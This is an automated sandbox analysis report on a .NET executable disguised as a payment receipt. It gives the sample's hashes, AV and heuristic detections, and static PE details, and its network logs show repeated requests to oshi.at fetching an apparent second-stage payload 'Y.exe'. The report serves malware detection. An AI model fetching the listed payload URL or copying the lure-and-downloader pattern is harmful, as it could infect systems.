Edit tour

Windows Analysis Report
PAYMENT_RECEIPT_STAN100699.exe

Overview

General Information

Sample Name:	PAYMENT_RECEIPT_STAN100699.exe
Analysis ID:	1335249
MD5:	488cd0c21974d76054d33936d477e0cd
SHA1:	3b9a70a4aaf40b1bada8c337801e35762f9207d2
SHA256:	6049ebd2d0d4238690c57ad4928ad638d26f1b19de398820e12e3bc86f874db0
Tags:	exe
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Initial sample is a PE file and has a suspicious name

.NET source code contains method to dynamically call methods (often used by packers)

Sample has a suspicious name (potential lure to open the executable)

Machine Learning detection for sample

Uses 32bit PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

May sleep (evasive loops) to hinder dynamic analysis

Binary contains a suspicious time stamp

Detected potential crypto function

PE / OLE file has an invalid certificate

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Uses insecure TLS / SSL version for HTTPS connection

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Enables debug privileges

Classification

Process Tree

System is w10x64

PAYMENT_RECEIPT_STAN100699.exe (PID: 7112 cmdline: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe MD5: 488CD0C21974D76054D33936D477E0CD)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: PAYMENT_RECEIPT_STAN100699.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: PAYMENT_RECEIPT_STAN100699.exe	ReversingLabs: Detection: 47%
Source: PAYMENT_RECEIPT_STAN100699.exe	Virustotal: Detection: 64%			Perma Link

Machine Learning detection for sample

Source: PAYMENT_RECEIPT_STAN100699.exe

Joe Sandbox ML: detected

Source: PAYMENT_RECEIPT_STAN100699.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.4:49741 version: TLS 1.0

Source: PAYMENT_RECEIPT_STAN100699.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: NHhH77.pdb source: PAYMENT_RECEIPT_STAN100699.exe
Source:	Binary string: NHhH77.pdbX source: PAYMENT_RECEIPT_STAN100699.exe

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 5.253.86.15 5.253.86.15

Source: unknown

HTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.4:49741 version: TLS 1.0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:26:39 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:26:47 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:26:56 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:27:07 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:27:15 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:27:21 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:27:30 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:27:37 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:27:43 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:27:51 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:27:59 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:28:13 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:28:20 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:28:35 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:28:43 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:29:04 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:29:12 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:29:24 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:29:31 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:29:43 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:29:49 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:29:59 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:30:10 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:30:21 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 01 Nov 2023 07:30:36 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close

Source: PAYMENT_RECEIPT_STAN100699.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: PAYMENT_RECEIPT_STAN100699.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: PAYMENT_RECEIPT_STAN100699.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: PAYMENT_RECEIPT_STAN100699.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203166372.0000000001132000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m#o
Source: PAYMENT_RECEIPT_STAN100699.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: PAYMENT_RECEIPT_STAN100699.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: PAYMENT_RECEIPT_STAN100699.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: PAYMENT_RECEIPT_STAN100699.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: PAYMENT_RECEIPT_STAN100699.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: PAYMENT_RECEIPT_STAN100699.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: PAYMENT_RECEIPT_STAN100699.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: PAYMENT_RECEIPT_STAN100699.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: PAYMENT_RECEIPT_STAN100699.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000003032000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030C3000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://oshi.at
Source: PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://oshi.at(
Source: PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000003032000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030C3000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://oshi.atd
Source: PAYMENT_RECEIPT_STAN100699.exe	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: PAYMENT_RECEIPT_STAN100699.exe	String found in binary or memory: http://s.symcd.com06
Source: PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PAYMENT_RECEIPT_STAN100699.exe	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: PAYMENT_RECEIPT_STAN100699.exe	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: PAYMENT_RECEIPT_STAN100699.exe	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: PAYMENT_RECEIPT_STAN100699.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203166372.0000000001132000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: PAYMENT_RECEIPT_STAN100699.exe	String found in binary or memory: https://d.symcb.com/cps0%
Source: PAYMENT_RECEIPT_STAN100699.exe	String found in binary or memory: https://d.symcb.com/rpa0
Source: PAYMENT_RECEIPT_STAN100699.exe	String found in binary or memory: https://d.symcb.com/rpa0.
Source: PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FD8000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030BF000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030AB000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000003097000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030BB000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.000000000308E000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FE4000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000003110000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FC8000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000003093000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030B3000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FD4000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FE8000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/somenonymous/OshiUpload
Source: PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030C3000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oshi.at
Source: PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oshi.at(
Source: PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oshi.at/qEWc/Y.exe
Source: PAYMENT_RECEIPT_STAN100699.exe	String found in binary or memory: https://oshi.at/qEWc/Y.exeG/C
Source: PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030E2000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030C3000.00000004.00000800.00020000.00000000.sdmp, PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203624068.00000000030D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oshi.at/qEWc/Y.exed

Source: unknown

DNS traffic detected: queries for: oshi.at

Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.at
Source: global traffic	HTTP traffic detected: GET /qEWc/Y.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: PAYMENT_RECEIPT_STAN100699.exe

Sample has a suspicious name (potential lure to open the executable)

Source: PAYMENT_RECEIPT_STAN100699.exe

Static file information: Suspicious name

Source: PAYMENT_RECEIPT_STAN100699.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000000.1743612813.0000000000AD2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNHhH77.exe. vs PAYMENT_RECEIPT_STAN100699.exe
Source: PAYMENT_RECEIPT_STAN100699.exe, 00000000.00000002.4203166372.00000000010FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PAYMENT_RECEIPT_STAN100699.exe
Source: PAYMENT_RECEIPT_STAN100699.exe	Binary or memory string: OriginalFilenameNHhH77.exe. vs PAYMENT_RECEIPT_STAN100699.exe

Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Code function: 0_2_02CF0DE8	0_2_02CF0DE8
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Code function: 0_2_02CF0A51	0_2_02CF0A51
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Code function: 0_2_02CF0A60	0_2_02CF0A60
Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe	Code function: 0_2_02CF0DD9	0_2_02CF0DD9

Source: PAYMENT_RECEIPT_STAN100699.exe

Static PE information: invalid certificate

Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Process Stats: CPU usage > 49%

Source: PAYMENT_RECEIPT_STAN100699.exe	ReversingLabs: Detection: 47%
Source: PAYMENT_RECEIPT_STAN100699.exe	Virustotal: Detection: 64%

Source: PAYMENT_RECEIPT_STAN100699.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PAYMENT_RECEIPT_STAN100699.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
